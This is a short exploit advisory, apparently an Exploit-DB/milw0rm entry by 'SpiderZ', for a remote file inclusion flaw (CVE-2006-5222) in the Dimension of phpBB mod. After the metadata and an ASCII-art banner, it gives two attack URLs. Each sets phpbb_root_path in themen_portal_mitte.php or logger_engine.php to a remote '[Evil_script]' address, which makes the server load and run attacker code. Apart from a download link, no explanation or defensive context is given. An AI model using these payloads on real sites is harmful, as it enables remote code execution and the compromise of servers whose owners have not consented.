[] NeoSense

Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions

Author: SpiderZ
type: webapps
platform: php
port: 
date_added: 2006-10-04 
date_updated:  
verified: 1 
codes: OSVDB-29532;CVE-2006-5222;OSVDB-29531 
tags: 
aliases:  
screenshot_url:  
application_url: 

_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

# milw0rm.com [2006-10-05]